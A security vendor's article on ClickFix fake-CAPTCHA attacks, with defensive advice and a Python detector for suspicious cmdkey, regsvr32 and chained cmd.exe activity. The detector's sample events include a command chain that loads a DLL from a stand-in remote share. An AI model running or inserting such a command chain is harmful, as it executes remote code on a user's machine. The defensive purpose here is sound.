ClickFix: The Attack That Turns Your Employees Into Their Own Hackers
THREAT INTELLIGENCE | JUNE 2026
A user visits what looks like a normal website. A message appears — browser error, CAPTCHA failed, update required. The site instructs them to copy a command and paste it into PowerShell. They do it. Malware installs silently. Credentials are gone.
No exploit. No suspicious attachment. No warning from the firewall. The user did it themselves.
This is ClickFix, and it is one of the fastest-growing attack techniques in 2026.
Why Security Tools Don't Stop It
Most endpoint security is built to detect software behaving maliciously. ClickFix takes the malicious software out of the initial step entirely: the user runs the command. To your security stack, that launch looks like a normal user action — because it is. There is no automated delivery stage to flag.
Attackers are also actively hardening the technique against detection. Some are using server-side polymorphism, where the attacker's server generates a unique, freshly obfuscated payload for every request. Signature-based tools cannot match a hash that has never been seen before. A newer variant abandons PowerShell entirely and chains native Windows tools — cmdkey and regsvr32 — to deliver a remote payload without ever dropping a file on disk. The execution blends into normal system behavior.
The barrier to running one of these attacks is also nearly zero. An attacker with no programming background can stand up a live ClickFix campaign in under ten minutes using commercially available builders that handle page generation, payload delivery, and live victim monitoring.
What Is Being Stolen
The payloads vary, but the outcomes are consistently severe. Info stealers harvest saved passwords, browser cookies, credit card data, and crypto wallet keys. Remote access trojans hand the attacker full control of the victim's machine — files, webcam, keystrokes. Ransomware loaders encrypt everything and demand payment.
One commercially available tool called Venom Stealer illustrates how industrialized this has become. Rather than stealing credentials once and exiting, Venom maintains persistence — continuously monitoring browser databases and capturing newly saved credentials in real time. It runs on a subscription model. An attacker can rent it starting at $250 per month. This persistence is why common incident response moves like password rotation don't fully close the exposure: newly updated credentials get intercepted too.
The Scale in 2026
This is not a niche threat. Microsoft tracked roughly 8.3 billion email-based phishing attempts in Q1 2026. CAPTCHA-gated attacks specifically more than doubled in March, reaching nearly 12 million — the highest volume in over a year.
A SQL injection vulnerability in Ghost CMS was exploited to silently poison over 700 websites with ClickFix malware. Among the confirmed victims: websites operated by Harvard, Oxford, and Auburn universities, spanning industries from fintech to security research. ClickFix has also expanded to macOS. Attackers purchased Google Ads redirecting users to fake documentation sites for AI developer tools including Claude Code, Grok, and Gemini CLI. A ClickFix-style terminal prompt tricked users into running a command that installed the AMOS Stealer. Engineers, developers, and product leads are disproportionately Mac users with access to source code repositories and privileged cloud credentials — which makes them high-value targets.
What Your Organization Should Do
Train your employees on the one rule that breaks this attack. No legitimate website — not Cloudflare, not Google, not Microsoft — will ever ask a user to open a terminal, PowerShell window, or Run dialog and paste in a command. This is a universal rule with no exceptions. The entire ClickFix attack chain collapses the moment that rule is understood and believed. Regular phishing simulations that include fake CAPTCHA scenarios are the most direct way to reinforce it.
Enforce phishing-resistant MFA on privileged accounts. Deploy passwordless authentication using FIDO keys and enforce phishing-resistant multi-factor authentication through conditional access policies for any account with elevated access. A stolen password should never be sufficient on its own.
Restrict and monitor the execution paths attackers rely on. Limit PowerShell usage for standard users, disable the Run dialog where it isn't needed, and monitor for cmdkey usage involving external IP addresses and regsvr32 loading remote DLLs over UNC paths. Set alerts for chained command execution through cmd.exe and restrict outbound SMB and UNC access at the network level.
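The monitoring points above (cmdkey with an external IP address, regsvr32 loading a DLL from a UNC path or URL, and chained execution through cmd.exe) can be expressed as a small set of rules over process-creation telemetry. The following is an added example, not code from the article or from SecureCyber: it assumes Sysmon Event ID 1-style fields (image, parent image, command line) flattened into dictionaries, uses a constructed sample event set with documentation-range addresses, and treats the listed RFC 1918/loopback/link-local ranges as "internal"; the rule names and the internal-range list are assumptions to tune for your own environment.

```python
import ipaddress
import re

# Assumption: these ranges count as internal; anything else is "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")   # loose; validated below
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")                  # \\host\share...
URL_RE = re.compile(r"https?://", re.IGNORECASE)
CHAIN_RE = re.compile(r"[&|]")                          # &, &&, |, || in cmd.exe
LOLBIN_RE = re.compile(r"\b(cmdkey|regsvr32)\b", re.IGNORECASE)

# Constructed sample events (hypothetical, not from a real incident).
# 203.0.113.0/24 is the TEST-NET-3 documentation range.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c cmdkey /add:203.0.113.10 /user:guest /pass: & regsvr32 /s \\203.0.113.10\share\update.dll"},
    {"pid": 4130, "image": r"C:\Windows\System32\cmdkey.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmdkey /add:203.0.113.10 /user:guest /pass:"},
    {"pid": 4140, "image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32 /s \\203.0.113.10\share\update.dll"},
    # Benign: cmdkey against an internal hostname, no IP literal at all.
    {"pid": 5200, "image": r"C:\Windows\System32\cmdkey.exe", "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"cmdkey /add:fileserver01 /user:CORP\svc_backup /pass:"},
    # Benign: regsvr32 registering a local DLL during an installer run.
    {"pid": 5300, "image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},
    # Benign: cmd.exe with a single, unchained command.
    {"pid": 5400, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c dir"},
]


def external_ips(text):
    """Return IPv4 literals in text that fall outside INTERNAL_NETS.

    Invalid dotted quads matched by the loose regex (e.g. 999.1.1.1) are skipped.
    """
    hits = []
    for lit in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(lit)
        except ValueError:
            continue
        if not any(ip in net for net in INTERNAL_NETS):
            hits.append(lit)
    return hits


def detect(event):
    """Return the list of rule names that fire for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    hits = []
    if image == "cmdkey.exe" and external_ips(cmd):
        hits.append("cmdkey_external_ip")
    if image == "regsvr32.exe" and (UNC_RE.search(cmd) or URL_RE.search(cmd)):
        hits.append("regsvr32_remote_dll")
    if image == "cmd.exe" and CHAIN_RE.search(cmd):
        hits.append("cmd_chained_execution")
        # Higher-confidence variant: the chain itself invokes the binaries named above.
        if LOLBIN_RE.search(cmd):
            hits.append("cmd_chain_lolbin")
    return hits


def scan(events):
    """Map pid -> fired rules, keeping only events that triggered at least one rule."""
    results = {}
    for event in events:
        hits = detect(event)
        if hits:
            results[event["pid"]] = hits
    return results


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        event = next(e for e in SAMPLE_EVENTS if e["pid"] == pid)
        print(f"pid={pid} parent={event['parent']} rules={rules}")
        print(f"    {event['cmdline']}")
```

The three rules are deliberately independent so that each one can be tuned on its own false-positive rate: a single `cmd.exe` chain is common in scripted administration, so `cmd_chained_execution` alone is a low-severity signal, while `cmd_chain_lolbin` or a `cmdkey_external_ip` hit immediately following it is what should page the SOC. Parent image is carried through to the alert because a `cmd.exe` spawned from `explorer.exe` (a user pasting into the Run dialog) is the shape this attack produces.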
Treat your macOS endpoints as seriously as Windows. Your SOC needs the capability to analyze macOS samples behaviorally. Implement user education specifically around AI platform trust. Apply the same endpoint detection, logging, and incident response coverage to macOS that you apply to everything else. The assumption that Macs are lower risk is exactly what attackers are counting on.
The Bottom Line
ClickFix requires no zero-day, no sophisticated delivery chain, and no technical skill from the attacker. It requires only that an employee trusts a fake CAPTCHA and follows instructions. That is a training problem — and it is a solvable one.
SecureCyber's Managed SOC service has demonstrated the capability to stop and respond to ClickFix attacks and their evolving variants, keeping your organization secure.
If you want to assess your organization's exposure or run a ClickFix-focused phishing simulation with your team, SecureCyber can help.
www.secdef.com | 937-388-4405 | sales@secdef.com